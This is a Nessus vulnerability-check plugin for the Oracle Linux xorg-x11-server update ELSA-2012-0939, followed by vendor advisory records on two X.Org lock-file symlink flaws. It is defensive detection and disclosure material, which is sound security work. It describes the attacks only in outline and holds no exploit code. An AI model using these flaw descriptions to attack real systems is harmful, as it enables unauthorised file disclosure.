ID: ORACLELINUX_ELSA-2012-0939.NASL
Type: nessus
Reporter: This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified: 2013-07-12T00:00:00
Description
From Red Hat Security Advisory 2012:0939 :
Updated xorg-x11-server packages that fix two security issues and
several bugs are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having low
security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.
X.Org is an open source implementation of the X Window System. It
provides the basic low-level functionality that full-fledged graphical
user interfaces are designed upon.
A flaw was found in the way the X.Org server handled lock files. A
local user with access to the system console could use this flaw to
determine the existence of a file in a directory not accessible to the
user, via a symbolic link attack. (CVE-2011-4028)
A race condition was found in the way the X.Org server managed
temporary lock files. A local attacker could use this flaw to perform
a symbolic link attack, allowing them to make an arbitrary file world
readable, leading to the disclosure of sensitive information.
(CVE-2011-4029)
Red Hat would like to thank the researcher with the nickname vladz for
reporting these issues.
This update also fixes the following bugs :
* Prior to this update, the KDE Display Manager (KDM) could pass
invalid 24bpp pixmap formats to the X server. As a consequence, the X
server could unexpectedly abort. This update modifies the underlying
code to pass the correct formats. (BZ#651934, BZ#722860)
* Prior to this update, absolute input devices, like the stylus of a
graphic tablet, could become unresponsive in the right-most or
bottom-most screen if the X server was configured as a multi-screen
setup through multiple 'Device' sections in the xorg.conf file. This
update changes the screen crossing behavior so that absolute devices
are always mapped across all screens. (BZ#732467)
* Prior to this update, the misleading message 'Session active, not
inhibited, screen idle. If you see this test, your display server is
broken and you should notify your distributor.' could be displayed
after resuming the system or re-enabling the display, and included a
URL to an external web page. This update removes this message.
(BZ#748704)
* Prior to this update, the erroneous input handling code of the
Xephyr server disabled screens on a screen crossing event. The focus
was only on the screen where the mouse was located and only this
screen was updated when the Xephyr nested X server was configured in a
multi-screen setup. This update removes this code and Xephyr now
correctly updates screens in multi-screen setups. (BZ#757792)
* Prior to this update, raw events did not contain relative axis
values. As a consequence, clients which relied on relative values for
functioning did not behave as expected. This update sets the values to
the original driver values instead of the already transformed values.
Now, raw events contain relative axis values as expected. (BZ#805377)
All users of xorg-x11-server are advised to upgrade to these updated
packages, which correct these issues. All running X.Org server
instances must be restarted for this update to take effect.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2012:0939 and
# Oracle Linux Security Advisory ELSA-2012-0939 respectively.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
  script_id(68561);
  script_version("1.9");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/14");

  script_cve_id("CVE-2011-4028", "CVE-2011-4029");
  script_bugtraq_id(50193, 50196);
  script_xref(name:"RHSA", value:"2012:0939");

  script_name(english:"Oracle Linux 6 : xorg-x11-server (ELSA-2012-0939)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Oracle Linux host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"From Red Hat Security Advisory 2012:0939 :
Updated xorg-x11-server packages that fix two security issues and
several bugs are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having low
security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.
X.Org is an open source implementation of the X Window System. It
provides the basic low-level functionality that full-fledged graphical
user interfaces are designed upon.
A flaw was found in the way the X.Org server handled lock files. A
local user with access to the system console could use this flaw to
determine the existence of a file in a directory not accessible to the
user, via a symbolic link attack. (CVE-2011-4028)
A race condition was found in the way the X.Org server managed
temporary lock files. A local attacker could use this flaw to perform
a symbolic link attack, allowing them to make an arbitrary file world
readable, leading to the disclosure of sensitive information.
(CVE-2011-4029)
Red Hat would like to thank the researcher with the nickname vladz for
reporting these issues.
This update also fixes the following bugs :
* Prior to this update, the KDE Display Manager (KDM) could pass
invalid 24bpp pixmap formats to the X server. As a consequence, the X
server could unexpectedly abort. This update modifies the underlying
code to pass the correct formats. (BZ#651934, BZ#722860)
* Prior to this update, absolute input devices, like the stylus of a
graphic tablet, could become unresponsive in the right-most or
bottom-most screen if the X server was configured as a multi-screen
setup through multiple 'Device' sections in the xorg.conf file. This
update changes the screen crossing behavior so that absolute devices
are always mapped across all screens. (BZ#732467)
* Prior to this update, the misleading message 'Session active, not
inhibited, screen idle. If you see this test, your display server is
broken and you should notify your distributor.' could be displayed
after resuming the system or re-enabling the display, and included a
URL to an external web page. This update removes this message.
(BZ#748704)
* Prior to this update, the erroneous input handling code of the
Xephyr server disabled screens on a screen crossing event. The focus
was only on the screen where the mouse was located and only this
screen was updated when the Xephyr nested X server was configured in a
multi-screen setup. This update removes this code and Xephyr now
correctly updates screens in multi-screen setups. (BZ#757792)
* Prior to this update, raw events did not contain relative axis
values. As a consequence, clients which relied on relative values for
functioning did not behave as expected. This update sets the values to
the original driver values instead of the already transformed values.
Now, raw events contain relative axis values as expected. (BZ#805377)
All users of xorg-x11-server are advised to upgrade to these updated
packages, which correct these issues. All running X.Org server
instances must be restarted for this update to take effect."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://oss.oracle.com/pipermail/el-errata/2012-July/002912.html"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected xorg-x11-server packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-Xdmx");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-Xephyr");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-Xnest");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-Xorg");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-Xvfb");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-common");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-source");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:6");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/07/03");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/07/02");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/07/12");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Oracle Linux Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

# Local checks must be enabled and the target must identify as Oracle Linux.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux");
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || !pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux");

# Extract the OS version from the release string; only Oracle Linux 6 is covered.
os_ver = pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux");
os_ver = os_ver[1];
if (! preg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 6", "Oracle Linux " + os_ver);

# The collected RPM list and a supported CPU architecture are required.
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu);

# Count each installed package that is older than the fixed build.
flag = 0;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-Xdmx-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-Xephyr-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-Xnest-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-Xorg-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-Xvfb-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-common-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-devel-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-source-1.10.6-1.el6")) flag++;

# Report outdated packages; otherwise record why the host is not affected.
if (flag)
{
  if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());
  else security_note(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc");
}
{"cve": [{"lastseen": "2021-02-02T05:51:07", "description": "The LockServer function in os/utils.c in X.Org xserver before 1.11.2 allows local users to change the permissions of arbitrary files to 444, read those files, and possibly cause a denial of service (removed execution permission) via a symlink attack on a temporary lock file.", "edition": 7, "cvss3": {}, "published": "2012-07-03T19:55:00", "title": "CVE-2011-4029", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4029"], "modified": "2020-08-24T17:14:00", "cpe": ["cpe:/a:x.org:x_server:1.11.1", "cpe:/a:x.org:x_server:1.11.0"], "id": "CVE-2011-4029", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4029", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:x.org:x_server:1.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:x.org:x_server:1.11.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:07", "description": "The LockServer function in os/utils.c in X.Org xserver before 1.11.2 allows local users to determine the existence of arbitrary files via a symlink attack on a temporary lock file, which is handled differently if the file exists.", "edition": 7, "cvss3": {}, "published": "2012-07-03T19:55:00", "title": "CVE-2011-4028", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.2, "vectorString": "AV:L/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4028"], "modified": "2020-08-24T17:14:00", "cpe": ["cpe:/a:x.org:x_server:1.11.1", "cpe:/a:x.org:x_server:1.11.0"], "id": "CVE-2011-4028", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4028", "cvss": {"score": 1.2, "vector": "AV:L/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:x.org:x_server:1.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:x.org:x_server:1.11.1:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:54", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "### Background\n\nThe X Window System is a graphical windowing system based on a client/server model. \n\n### Description\n\nvladz reported the following vulnerabilities in the X.Org X server:\n\n * The X.Org X server follows symbolic links when trying to access the lock file for a X display, showing a predictable behavior depending on the file type of the link target (CVE-2011-4028). \n * The X.Org X server lock file mechanism allows for a race condition to cause the X server to modify the file permissions of an arbitrary file to 0444 (CVE-2011-4029). \n\n### Impact\n\nA local attacker could exploit these vulnerabilities to disclose information by making arbitrary files on a system world-readable or gain information whether a specified file exists on the system and whether it is a file, directory, or a named pipe. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll X.Org X Server 1.9 users should upgrade to the latest 1.9 version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-base/xorg-server-1.9.5-r1\"\n \n\nAll X.Org X Server 1.10 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-base/xorg-server-1.10.4-r1\"", "edition": 1, "modified": "2011-10-22T00:00:00", "published": "2011-10-22T00:00:00", "id": "GLSA-201110-19", "href": "https://security.gentoo.org/glsa/201110-19", "type": "gentoo", "title": "X.Org X Server: Multiple vulnerabilities", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "centos": [{"lastseen": "2019-12-20T18:26:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0939\n\n\nX.Org is an open source implementation of the X Window System. It provides\nthe basic low-level functionality that full-fledged graphical user\ninterfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A local\nuser with access to the system console could use this flaw to determine the\nexistence of a file in a directory not accessible to the user, via a\nsymbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed temporary\nlock files. A local attacker could use this flaw to perform a symbolic link\nattack, allowing them to make an arbitrary file world readable, leading to\nthe disclosure of sensitive information. (CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs:\n\n* Prior to this update, the KDE Display Manager (KDM) could pass invalid\n24bpp pixmap formats to the X server. As a consequence, the X server could\nunexpectedly abort. 
This update modifies the underlying code to pass the\ncorrect formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or bottom-most\nscreen if the X server was configured as a multi-screen setup through\nmultiple \"Device\" sections in the xorg.conf file. This update changes the\nscreen crossing behavior so that absolute devices are always mapped across\nall screens. (BZ#732467)\n\n* Prior to this update, the misleading message \"Session active, not\ninhibited, screen idle. If you see this test, your display server is broken\nand you should notify your distributor.\" could be displayed after resuming\nthe system or re-enabling the display, and included a URL to an external\nweb page. This update removes this message. (BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the Xephyr\nserver disabled screens on a screen crossing event. The focus was only on\nthe screen where the mouse was located and only this screen was updated\nwhen the Xephyr nested X server was configured in a multi-screen setup.\nThis update removes this code and Xephyr now correctly updates screens in\nmulti-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis values. As\na consequence, clients which relied on relative values for functioning did\nnot behave as expected. This update sets the values to the original driver\nvalues instead of the already transformed values. Now, raw events contain\nrelative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. 
All running X.Org server instances\nmust be restarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-July/030760.html\n\n**Affected packages:**\nxorg-x11-server\nxorg-x11-server-Xdmx\nxorg-x11-server-Xephyr\nxorg-x11-server-Xnest\nxorg-x11-server-Xorg\nxorg-x11-server-Xvfb\nxorg-x11-server-common\nxorg-x11-server-devel\nxorg-x11-server-source\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0939.html", "edition": 3, "modified": "2012-07-10T17:26:54", "published": "2012-07-10T17:26:54", "href": "http://lists.centos.org/pipermail/centos-announce/2012-July/030760.html", "id": "CESA-2012:0939", "title": "xorg security update", "type": "centos", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}], "suse": [{"lastseen": "2016-09-04T12:23:22", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The X server had two security issues and one bug that is\n fixed by this update.\n\n CVE-2011-4028: It is possible for a local attacker to\n deduce if a file exists or not by exploiting the way that\n Xorg creates its lock files.\n\n CVE-2011-4029: It is possible for a non-root local user to\n set the read permission for all users on any file or\n directory.\n\n", "edition": 1, "modified": "2012-02-09T19:10:34", "published": "2012-02-09T19:10:34", "id": "OPENSUSE-SU-2012:0227-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00008.html", "title": "xorg-x11-server (important)", "type": "suse", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-04T11:32:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "This update fixes two security issues with the X server:\n\n * A local attacker could find out if a file exists by\n exploiting the way that Xorg creates its lock files.\n (CVE-2011-4028\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4028>)\n * A non-root local user could set the read permission\n for all users on any file or directory. (CVE-2011-4029\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4029>)\n", "edition": 1, "modified": "2011-12-02T08:08:16", "published": "2011-12-02T08:08:16", "id": "SUSE-SU-2011:1292-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-12/msg00002.html", "type": "suse", "title": "Security update for xorg-x11-server (important)", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:55", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "X.Org is an open source implementation of the X Window System. It provides\nthe basic low-level functionality that full-fledged graphical user\ninterfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A local\nuser with access to the system console could use this flaw to determine the\nexistence of a file in a directory not accessible to the user, via a\nsymbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed temporary\nlock files. A local attacker could use this flaw to perform a symbolic link\nattack, allowing them to make an arbitrary file world readable, leading to\nthe disclosure of sensitive information. (CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs:\n\n* Prior to this update, the KDE Display Manager (KDM) could pass invalid\n24bpp pixmap formats to the X server. As a consequence, the X server could\nunexpectedly abort.
This update modifies the underlying code to pass the\ncorrect formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or bottom-most\nscreen if the X server was configured as a multi-screen setup through\nmultiple \"Device\" sections in the xorg.conf file. This update changes the\nscreen crossing behavior so that absolute devices are always mapped across\nall screens. (BZ#732467)\n\n* Prior to this update, the misleading message \"Session active, not\ninhibited, screen idle. If you see this test, your display server is broken\nand you should notify your distributor.\" could be displayed after resuming\nthe system or re-enabling the display, and included a URL to an external\nweb page. This update removes this message. (BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the Xephyr\nserver disabled screens on a screen crossing event. The focus was only on\nthe screen where the mouse was located and only this screen was updated\nwhen the Xephyr nested X server was configured in a multi-screen setup.\nThis update removes this code and Xephyr now correctly updates screens in\nmulti-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis values. As\na consequence, clients which relied on relative values for functioning did\nnot behave as expected. This update sets the values to the original driver\nvalues instead of the already transformed values. Now, raw events contain\nrelative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. 
All running X.Org server instances\nmust be restarted for this update to take effect.\n", "modified": "2018-06-06T20:24:25", "published": "2012-06-20T04:00:00", "id": "RHSA-2012:0939", "href": "https://access.redhat.com/errata/RHSA-2012:0939", "type": "redhat", "title": "(RHSA-2012:0939) Low: xorg-x11-server security and bug fix update", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-13T18:45:19", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028"], "description": "X.Org is an open source implementation of the X Window System. It provides\nthe basic low-level functionality that full-fledged graphical user\ninterfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A local\nuser with access to the system console could use this flaw to determine the\nexistence of a file in a directory not accessible to the user, via a\nsymbolic link attack. (CVE-2011-4028)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting this issue.\n\nThis update also fixes the following bugs:\n\n* In rare cases, if the front and back buffer of the miDbePositionWindow()\nfunction were not both allocated in video memory, or were both allocated in\nsystem memory, the X Window System sometimes terminated unexpectedly. A\npatch has been provided to address this issue and X no longer crashes in\nthe described scenario. (BZ#596899)\n\n* Previously, when the miSetShape() function called the miRegionDestroy()\nfunction with a NULL region, X terminated unexpectedly if the backing store\nwas enabled. Now, X no longer crashes in the described scenario.\n(BZ#676270)\n\n* On certain workstations running in 32-bit mode, the X11 mouse cursor\noccasionally became stuck near the left edge of the X11 screen. A patch has\nbeen provided to address this issue and the mouse cursor no longer becomes\nstuck in the described scenario. 
(BZ#529717)\n\n* On certain workstations with a dual-head graphics adapter using the r500\ndriver in Zaphod mode, the mouse pointer was confined to one monitor screen\nand could not move to the other screen. A patch has been provided to\naddress this issue and the mouse cursor works properly across both screens.\n(BZ#559964)\n\n* Due to a double free operation, Xvfb (X virtual framebuffer) terminated\nunexpectedly with a segmentation fault randomly when the last client\ndisconnected, that is when the server reset. This bug has been fixed in the\nmiDCCloseScreen() function and Xvfb no longer crashes. (BZ#674741)\n\n* Starting the Xephyr server on an AMD64 or Intel 64 architecture with an\nintegrated graphics adapter caused the server to terminate unexpectedly.\nThis bug has been fixed in the code and Xephyr no longer crashes in the\ndescribed scenario. (BZ#454409)\n\n* Previously, when a client made a request bigger than 1/4th of the limit\nadvertised in the BigRequestsEnable reply, the X server closed the\nconnection unexpectedly. With this update, the maxBigRequestSize variable\nhas been added to the code to check the size of client requests, thus\nfixing this bug. (BZ#555000)\n\n* When an X client running on a big-endian system called the\nXineramaQueryScreens() function, the X server terminated unexpectedly. This\nbug has been fixed in the xf86Xinerama module and the X server no longer\ncrashes in the described scenario. (BZ#588346)\n\n* When installing Red Hat Enterprise Linux 5 on an IBM eServer System p\nblade server, the installer did not set the correct mode on the built-in\nKVM (Keyboard-Video-Mouse). Consequently, the graphical installer took a\nvery long time to appear and then was displayed incorrectly. A patch has\nbeen provided to address this issue and the graphical installer now works\nas expected in the described scenario. Note that this fix requires the\nRed Hat Enterprise Linux 5.8 kernel update. 
(BZ#740497)\n\n* Lines longer than 46,340 pixels can be drawn with one of the coordinates\nbeing negative. However, for dashed lines, the miPolyBuildPoly() function\noverflowed the \"int\" type when setting up edges for a section of a dashed\nline. Consequently, dashed segments were not drawn at all. An upstream\npatch has been applied to address this issue and dashed lines are now drawn\ncorrectly. (BZ#649810)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server instances\nmust be restarted for this update to take effect.\n", "modified": "2017-09-08T11:54:54", "published": "2012-02-21T05:00:00", "id": "RHSA-2012:0303", "href": "https://access.redhat.com/errata/RHSA-2012:0303", "type": "redhat", "title": "(RHSA-2012:0303) Low: xorg-x11-server security and bug fix update", "cvss": {"score": 1.2, "vector": "AV:L/AC:H/Au:N/C:P/I:N/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:21", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "[1.10.6-1]\n- xserver 1.10.6\n- Use git-style patch names\n- compsize.h, glxcmds.h: Copy from upstream git since they fell out of the\n upstream tarball\n[1.10.4-15]\n- Undo regression introduced in Patch8007 (#732467)\n[1.10.4-14]\n- xserver-1.10.4-sync-revert.patch: Revert an edge-case change in IDLETIME\n that appears to be more wrong than right. (#748704)\n[1.10.4-13]\n- xserver-1.10.4-randr-corner-case.patch: Fix a corner case in initial\n mode selection. (#657580)\n- xserver-1.10.4-vbe-no-cache-ddc-support.patch: Only interpret complete\n non-support for DDC extension as 'DDC unavailable'. 
(#657580)\n[1.10.4-11]\n- xserver-1.10.4-dix-when-rescaling-from-master-rescale-from-desktop-.patch:\n fix rescaling from master to slave if the pointer (#732467)\n[1.10.4-10]\n- Add patches to change the screen crossing behaviour for multiple\n ScreenRecs (#732467)\n- remove the xorg.conf.man page from our .gitignore - we need to patch it\n now and its part of the upstream distribution\n[1.10.4-9]\n- xserver-1.10.4-no-24bpp-xaa-composite.patch: Disable Composite at 24bpp\n in XAA (#651934)\n[1.10.4-8]\n- xserver-1.10.4-fb-picture-crash.patch: Fix crash on invalid pictures (#722680)\n[1.10.4-7]\n- fix xephyr rendering when using two screens (#757792)", "edition": 4, "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "id": "ELSA-2012-0939", "href": "http://linux.oracle.com/errata/ELSA-2012-0939.html", "title": "xorg-x11-server security and bug fix update", "type": "oraclelinux", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2010-1166", "CVE-2011-4818"], "description": "[1.1.1-48.90.0.1.el5]\n- Added oracle-enterprise-detect.patch\n- Replaced 'Red Hat' in spec file\n[1.1.1-48.90]\n- cve-2011-4028.patch: File existence disclosure vulnerability.\n[1.1.1-48.88]\n- cve-2011-4818.patch: Multiple input sanitization flaws in Render and GLX\n- xorg-x11-server-1.1.0-mesa-copy-sub-buffer.patch: Likewise.\n[1.1.1-48.87]\n- xserver-1.1.1-fbdev-iterate-modes.patch: fix fbdev driver not iterating\n across all modes of a certain dimension (#740497)\n[1.1.1-48.86]\n- xserver-1.1.1-midc-double-free.patch: Don't double-free the picture for\n the root window when using the mi (software) cursor path. 
(#674741)\n[1.1.1-48.85]\n- xserver-1.1.1-bigreqs-buffer-size.patch: Fix BIG-REQUESTS buffer size\n (#555000)\n[1.1.1-48.84]\n- xserver-1.1.1-xinerama-crash.patch: Fix a crash in XineramaQueryScreens\n when client is swapped (#588346)\n[1.1.1-48.83]\n- xserver-1.1.1-xephyr-keymap.patch: Fix types in Xephyr keymap setup (#454409)\n[1.1.1-48.82]\n- xserver-1.1.1-wideline-overflow.patch: Fix integer overflow in wide line\n renderer (#649810)\n[1.1.1-48.81]\n- Fix mouse stuck on edge (#529717)\n[1.1.1-48.80]\n- xserver-1.1.1-bs-crash.patch: Fix a crash in backing store. (#676270)\n[1.1.1-48.79]\n- xserver-1.1.1-randr-fix-mouse-crossing.patch: fix zaphod mouse crossing (#559964)\n[1.1.1-48.78]\n- cve-2010-1166.patch: Fix broken modulo math in Render and arc code.\n Identical to xserver-1.1.1-mod-macro-parens.patch in 5.5.z. (#582651)\n[1.1.1-48.77]\n- xserver-1.1.1-dbe-validate-gc.patch: Validate the GC against both front\n and back buffers (#596899)", "edition": 5, "modified": "2012-03-01T00:00:00", "published": "2012-03-01T00:00:00", "id": "ELSA-2012-0303", "href": "http://linux.oracle.com/errata/ELSA-2012-0303.html", "title": "xorg-x11-server security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:56", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "\nMatthieu Herrb reports:\n\nIt is possible to deduce if a file exists or not by exploiting\n\t the way that Xorg creates its lock files. This is caused by the\n\t fact that the X server is behaving differently if the lock file\n\t already exists as a symbolic link pointing to an existing or\n\t non-existing file.\nIt is possible for a non-root user to set the permissions for\n\t all users on any file or directory to 444, giving unwanted read\n\t access or causing denies of service (by removing execute\n\t permission). 
